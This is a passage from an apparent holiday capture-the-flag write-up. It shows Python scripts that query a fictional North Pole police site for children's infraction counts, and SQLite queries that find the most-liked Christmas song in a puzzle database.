has a section infractions, where you can find what kind of infractions were
commited by children. The infractions go from &lt;a class="reference external" href="https://nppd.northpolechristmastown.com/infractions?query=Playing+ball+in+house"&gt;playing ball in the house&lt;/a&gt;
to &lt;a class="reference external" href="https://nppd.northpolechristmastown.com/infractions?query=Trying+to+ruin+Christmas"&gt;trying to ruin Christmas&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;After too many infractions, children are put on the naughty list. But how many
infractions does it take?&lt;/p&gt;
&lt;p&gt;On the SMB server, we also had a file called &amp;quot;Naughty and Nice List.csv&amp;quot;, which
gives us, line by line, the name of a child and whether their naughty or nice:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; head Naughty&lt;span class="se"&gt;\ &lt;/span&gt;and&lt;span class="se"&gt;\ &lt;/span&gt;Nice&lt;span class="se"&gt;\ &lt;/span&gt;List.csv
&lt;span class="go"&gt;Abdullah Lindsey,Nice&lt;/span&gt;
&lt;span class="go"&gt;Abigail Chavez,Nice&lt;/span&gt;
&lt;span class="go"&gt;Aditya Perera,Naughty&lt;/span&gt;
&lt;span class="go"&gt;Adrian Kemp,Nice&lt;/span&gt;
&lt;span class="go"&gt;Adrian Lo,Nice&lt;/span&gt;
&lt;span class="go"&gt;Adriana Sutherland,Nice&lt;/span&gt;
&lt;span class="go"&gt;Agnes Adam,Nice&lt;/span&gt;
&lt;span class="go"&gt;Ahmed Hernandez,Nice&lt;/span&gt;
&lt;span class="go"&gt;Al Molina,Nice&lt;/span&gt;
&lt;span class="go"&gt;Alabaster Snowball,Nice&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Shame on you, Aditya Perera! Anyway, we can query the North Pole Police
Department website to query information on the children, and get results in
JSON for easy parsing. So, here's a quick Python script which queries the
NPPD website, and get the number of infractions for every child:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="ch"&gt;#!/usr/bin/env python3&lt;/span&gt;

&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="nn"&gt;sys&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="nn"&gt;requests&lt;/span&gt;

&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;main&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;naughty_nice_file&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="n"&gt;url&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;https://nppd.northpolechristmastown.com/infractions?query={}&amp;amp;json=1&amp;#39;&lt;/span&gt;
    &lt;span class="n"&gt;max_infraction_nice&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;
    &lt;span class="n"&gt;min_infraction_naughty&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;sys&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;maxsize&lt;/span&gt;

    &lt;span class="k"&gt;with&lt;/span&gt; &lt;span class="nb"&gt;open&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;naughty_nice_file&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;r&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="n"&gt;f&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="c1"&gt;# We read every line...&lt;/span&gt;
        &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;line&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;f&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;readlines&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
            &lt;span class="c1"&gt;# ...and get the name of the child&lt;/span&gt;
            &lt;span class="n"&gt;name&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;line&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;split&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;,&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
            &lt;span class="n"&gt;r&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;requests&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;url&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;format&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
            &lt;span class="c1"&gt;# We retrieve the number of infraction for the child&lt;/span&gt;
            &lt;span class="n"&gt;number_of_infractions&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;r&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;json&lt;/span&gt;&lt;span class="p"&gt;()[&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;count&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
            &lt;span class="c1"&gt;# If the child is nice, we see if the number of infraction is&lt;/span&gt;
            &lt;span class="c1"&gt;# greater than the existing max&lt;/span&gt;
            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;Nice&amp;#39;&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;line&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
                &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;number_of_infractions&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="n"&gt;max_infraction_nice&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
                    &lt;span class="n"&gt;max_infraction_nice&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;number_of_infractions&lt;/span&gt;
            &lt;span class="c1"&gt;# If the child is naughty, we see if the number of infraction is&lt;/span&gt;
            &lt;span class="c1"&gt;# smaller than the existing min&lt;/span&gt;
            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;Naughty&amp;#39;&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;line&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
                &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;number_of_infractions&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="n"&gt;min_infraction_naughty&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
                    &lt;span class="n"&gt;min_infraction_naughty&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;number_of_infractions&lt;/span&gt;

    &lt;span class="k"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;Maximum number of infractions for nice child: {}&amp;#39;&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;format&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;max_infraction_nice&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
    &lt;span class="k"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;Minimum number of infractions for naughty child: {}&amp;#39;&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;format&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;min_infraction_naughty&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;

&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="vm"&gt;__name__&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;__main__&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nb"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;sys&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="n"&gt;main&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;sys&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;
    &lt;span class="k"&gt;else&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="k"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;usage: {} &amp;lt;naughty_nice_file&amp;gt;&amp;#39;&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;format&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;sys&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;]))&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Now, let's run the script:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; ./number_of_infractions.py &lt;span class="s2"&gt;&amp;quot;Naughty and Nice List.csv&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;Maximum number of infractions for nice child: 3&lt;/span&gt;
&lt;span class="go"&gt;Minimum number of infractions for naughty child: 4&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We've found that every nice child has at most three infractions, and every
naughty child has at least four infractions. So it's safe to say that it takes
four infractions to be put on the naughty list.&lt;/p&gt;
&lt;p&gt;Technically, we could have only queried the number of infractions for naughty
children, which wouls have given us four. Then we would only had to find a
nice child with three infractions, such as &lt;a class="reference external" href="https://nppd.northpolechristmastown.com/infractions?query=al+molina"&gt;Al Molina&lt;/a&gt;.
This supposes that &lt;span class="formula"&gt;&lt;i&gt;max&lt;/i&gt;_&lt;i&gt;infraction&lt;/i&gt;_&lt;i&gt;nice&lt;/i&gt; &amp;lt; &lt;i&gt;min&lt;/i&gt;_&lt;i&gt;infraction&lt;/i&gt;_&lt;i&gt;naughty&lt;/i&gt;&lt;/span&gt;,
but this seems to be a valid hypothesis.&lt;/p&gt;
&lt;p&gt;Now, according to the report, the Munchkin moles were heavily into hair-pulling
and rock-throwing. Let's query the NPPD website for children that commited both
these infractions:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="ch"&gt;#!/usr/bin/env python3&lt;/span&gt;

&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="nn"&gt;requests&lt;/span&gt;

&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;main&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
    &lt;span class="n"&gt;hair_pulling_url&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;https://nppd.northpolechristmastown.com/infractions?query=Aggravated+pulling+of+hair&amp;amp;json=1&amp;#39;&lt;/span&gt;
    &lt;span class="n"&gt;rock_throwing_url&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;https://nppd.northpolechristmastown.com/infractions?query=Throwing+rocks+%28at+people%29&amp;amp;json=1&amp;#39;&lt;/span&gt;

    &lt;span class="c1"&gt;# We use sets to avoid duplicate names&lt;/span&gt;
    &lt;span class="n"&gt;hair_pullers&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;set&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
    &lt;span class="n"&gt;rock_throwers&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;set&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

    &lt;span class="c1"&gt;# We first get hair-pullers&lt;/span&gt;
    &lt;span class="n"&gt;r&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;requests&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;hair_pulling_url&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;result&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;r&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;json&lt;/span&gt;&lt;span class="p"&gt;()[&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;infractions&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;]:&lt;/span&gt;
        &lt;span class="n"&gt;hair_pullers&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;add&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;result&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;name&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;

    &lt;span class="c1"&gt;# Then we get rock throwers&lt;/span&gt;
    &lt;span class="n"&gt;r&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;requests&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;rock_throwing_url&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;result&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;r&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;json&lt;/span&gt;&lt;span class="p"&gt;()[&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;infractions&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;]:&lt;/span&gt;
        &lt;span class="n"&gt;rock_throwers&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;add&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;result&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;name&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;

    &lt;span class="c1"&gt;# Finally, we get the intersection, to find children who have done both&lt;/span&gt;
    &lt;span class="k"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;join&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;hair_pullers&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;intersection&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;rock_throwers&lt;/span&gt;&lt;span class="p"&gt;)))&lt;/span&gt;

&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="vm"&gt;__name__&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;__main__&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;main&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; ./find_moles.py
&lt;span class="go"&gt;Nina Fitzgerald&lt;/span&gt;
&lt;span class="go"&gt;Kirsty Evans&lt;/span&gt;
&lt;span class="go"&gt;Beverly Khalil&lt;/span&gt;
&lt;span class="go"&gt;Sheri Lewis&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We now have the name of four more probable Munchkin moles, which gives us a
total of six Munchkin moles.&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="sixth-page-of-the-great-book"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id44"&gt;Sixth page of &lt;em&gt;The Great Book&lt;/em&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;div class="section" id="north-pole-and-beyond-i-don-t-think-we-re-in-kansas-anymore"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id45"&gt;North Pole and Beyond: I don't think we're in Kansas anymore&lt;/a&gt;&lt;/h3&gt;
&lt;div class="section" id="id10"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id46"&gt;Cranberry Pi&lt;/a&gt;&lt;/h4&gt;
&lt;pre class="literal-block"&gt;
                       *
                      .~'
                     O'~..
                    ~'O'~..
                   ~'O'~..~'
                  O'~..~'O'~.
                 .~'O'~..~'O'~
                ..~'O'~..~'O'~.
               .~'O'~..~'O'~..~'
              O'~..~'O'~..~'O'~..
             ~'O'~..~'O'~..~'O'~..
            ~'O'~..~'O'~..~'O'~..~'
           O'~..~'O'~..~'O'~..~'O'~.
          .~'O'~..~'O'~..~'O'~..~'O'~
         ..~'O'~..~'O'~..~'O'~..~'O'~.
        .~'O'~..~'O'~..~'O'~..~'O'~..~'
       O'~..~'O'~..~'O'~..~'O'~..~'O'~..
      ~'O'~..~'O'~..~'O'~..~'O'~..~'O'~..
     ~'O'~..~'O'~..~'O'~..~'O'~..~'O'~..~'
    O'~..~'O'~..~'O'~..~'O'~..~'O'~..~'O'~.
   .~'O'~..~'O'~..~'O'~..~'O'~..~'O'~..~'O'~
  ..~'O'~..~'O'~..~'O'~..~'O'~..~'O'~..~'O'~.
 .~'O'~..~'O'~..~'O'~..~'O'~..~'O'~..~'O'~..~'
O'~..~'O'~..~'O'~..~'O'~..~'O'~..~'O'~..~'O'~..
Sugarplum Mary is in a tizzy, we hope you can assist.
Christmas songs abound, with many likes in our midst.
The database is populated, ready for you to address.
Identify the song whose popularity is the best.
&lt;/pre&gt;
&lt;p&gt;After finding the least popular browser, we must now find the most popular song
in the database:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@e3f1a585649d:~$&lt;/span&gt; ls -lh
&lt;span class="go"&gt;total 21M&lt;/span&gt;
&lt;span class="go"&gt;-rw-r--r-- 1 root root  16M Nov 29 19:28 christmassongs.db&lt;/span&gt;
&lt;span class="go"&gt;-rwxr-xr-x 1 root root 5.0M Dec  7 15:10 runtoanswer&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;A database in a single flat file indicates that it's most likely a SQLite
database:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@e3f1a585649d:~$&lt;/span&gt; sqlite3 ./christmassongs.db
&lt;span class="go"&gt;SQLite version 3.11.0 2016-02-15 17:29:24&lt;/span&gt;
&lt;span class="go"&gt;Enter &amp;quot;.help&amp;quot; for usage hints.&lt;/span&gt;
&lt;span class="go"&gt;sqlite&amp;gt; .tables&lt;/span&gt;
&lt;span class="go"&gt;likes  songs&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We have two tables, one named &lt;code&gt;likes&lt;/code&gt;, one named &lt;code&gt;songs&lt;/code&gt;. Let's
see their structure:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="go"&gt;sqlite&amp;gt; .schema&lt;/span&gt;
&lt;span class="go"&gt;CREATE TABLE songs(&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;  id INTEGER PRIMARY KEY AUTOINCREMENT,&lt;/span&gt;
&lt;/span&gt;&lt;span class="hll"&gt;&lt;span class="go"&gt;  title TEXT,&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;  artist TEXT,&lt;/span&gt;
&lt;span class="go"&gt;  year TEXT,&lt;/span&gt;
&lt;span class="go"&gt;  notes TEXT&lt;/span&gt;
&lt;span class="go"&gt;);&lt;/span&gt;
&lt;span class="go"&gt;CREATE TABLE likes(&lt;/span&gt;
&lt;span class="go"&gt;  id INTEGER PRIMARY KEY AUTOINCREMENT,&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;  like INTEGER,&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;  datetime INTEGER,&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;  songid INTEGER,&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;  FOREIGN KEY(songid) REFERENCES songs(id)&lt;/span&gt;
&lt;span class="go"&gt;);&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The &lt;code&gt;songs&lt;/code&gt; table is pretty straightforward. The &lt;code&gt;likes&lt;/code&gt; table
holds the number of likes for every song, using the song's id. If the
column &lt;code&gt;like&lt;/code&gt; is 1, then the song was liked.&lt;/p&gt;
&lt;p&gt;We can query the database to get the number of likes for every song id.
The correct query was found after reading &lt;a class="reference external" href="http://www.sqlitetutorial.net/sqlite-count-function/"&gt;this tutorial on the COUNT function&lt;/a&gt;.
This query will get the song id, their number of likes, and will sort them from
least to most liked.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="n"&gt;sqlite&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="n"&gt;songid&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;count&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;from&lt;/span&gt; &lt;span class="n"&gt;likes&lt;/span&gt; &lt;span class="k"&gt;WHERE&lt;/span&gt; &lt;span class="k"&gt;like&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt; &lt;span class="k"&gt;GROUP&lt;/span&gt; &lt;span class="k"&gt;BY&lt;/span&gt; &lt;span class="n"&gt;songid&lt;/span&gt; &lt;span class="k"&gt;ORDER&lt;/span&gt; &lt;span class="k"&gt;BY&lt;/span&gt; &lt;span class="k"&gt;count&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;[...]&lt;/span&gt;
&lt;span class="mi"&gt;33&lt;/span&gt;&lt;span class="o"&gt;|&lt;/span&gt;&lt;span class="mi"&gt;1698&lt;/span&gt;
&lt;span class="mi"&gt;199&lt;/span&gt;&lt;span class="o"&gt;|&lt;/span&gt;&lt;span class="mi"&gt;1702&lt;/span&gt;
&lt;span class="mi"&gt;98&lt;/span&gt;&lt;span class="o"&gt;|&lt;/span&gt;&lt;span class="mi"&gt;1706&lt;/span&gt;
&lt;span class="mi"&gt;90&lt;/span&gt;&lt;span class="o"&gt;|&lt;/span&gt;&lt;span class="mi"&gt;1715&lt;/span&gt;
&lt;span class="mi"&gt;134&lt;/span&gt;&lt;span class="o"&gt;|&lt;/span&gt;&lt;span class="mi"&gt;1719&lt;/span&gt;
&lt;span class="mi"&gt;265&lt;/span&gt;&lt;span class="o"&gt;|&lt;/span&gt;&lt;span class="mi"&gt;1720&lt;/span&gt;
&lt;span class="mi"&gt;245&lt;/span&gt;&lt;span class="o"&gt;|&lt;/span&gt;&lt;span class="mi"&gt;1756&lt;/span&gt;
&lt;span class="mi"&gt;392&lt;/span&gt;&lt;span class="o"&gt;|&lt;/span&gt;&lt;span class="mi"&gt;8996&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Alright, the song with the id 392 is the most liked song. Now, we could query
the &lt;code&gt;songs&lt;/code&gt; manually... Or! We could use an &lt;a class="reference external" href="http://www.sqlitetutorial.net/sqlite-inner-join/"&gt;inner junction&lt;/a&gt;,
just for the fun:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="n"&gt;sqlite&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="n"&gt;title&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;count&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;from&lt;/span&gt; &lt;span class="n"&gt;likes&lt;/span&gt; &lt;span class="k"&gt;INNER&lt;/span&gt; &lt;span class="k"&gt;JOIN&lt;/span&gt; &lt;span class="n"&gt;songs&lt;/span&gt; &lt;span class="k"&gt;on&lt;/span&gt; &lt;span class="n"&gt;songs&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;id&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;likes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;songid&lt;/span&gt; &lt;span class="k"&gt;WHERE&lt;/span&gt; &lt;span class="k"&gt;like&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt; &lt;span class="k"&gt;GROUP&lt;/span&gt; &lt;span class="k"&gt;BY&lt;/span&gt; &lt;span class="n"&gt;songid&lt;/span&gt; &lt;span class="k"&gt;ORDER&lt;/span&gt; &lt;span class="k"&gt;BY&lt;/span&gt; &lt;span class="k"&gt;count&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;[...]&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="n"&gt;I&lt;/span&gt; &lt;span class="n"&gt;Farted&lt;/span&gt; &lt;span class="k"&gt;on&lt;/span&gt; &lt;span class="n"&gt;Santa&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;s Lap (Now Christmas Is Gonna Stink for Me)|1689&lt;/span&gt;
&lt;/span&gt;&lt;span class="s1"&gt;Why Couldn&amp;#39;&lt;/span&gt;&lt;span class="n"&gt;t&lt;/span&gt; &lt;span class="n"&gt;It&lt;/span&gt; &lt;span class="n"&gt;Be&lt;/span&gt; &lt;span class="n"&gt;Christmas&lt;/span&gt; &lt;span class="k"&gt;Every&lt;/span&gt; &lt;span class="k"&gt;Day&lt;/span&gt;&lt;span class="o"&gt;?|&lt;/span&gt;&lt;span class="mi"&gt;1691&lt;/span&gt;
&lt;span class="n"&gt;A&lt;/span&gt; &lt;span class="n"&gt;Baby&lt;/span&gt; &lt;span class="n"&gt;Changes&lt;/span&gt; &lt;span class="n"&gt;Everything&lt;/span&gt;&lt;span class="o"&gt;|&lt;/span&gt;&lt;span class="mi"&gt;1693&lt;/span&gt;
&lt;span class="n"&gt;I&lt;/span&gt;&lt;span class="err"&gt;&amp;#39;&lt;/span&gt;&lt;span class="n"&gt;ll&lt;/span&gt; &lt;span class="n"&gt;Be&lt;/span&gt; &lt;span class="n"&gt;Home&lt;/span&gt;&lt;span class="o"&gt;|&lt;/span&gt;&lt;span class="mi"&gt;1695&lt;/span&gt;
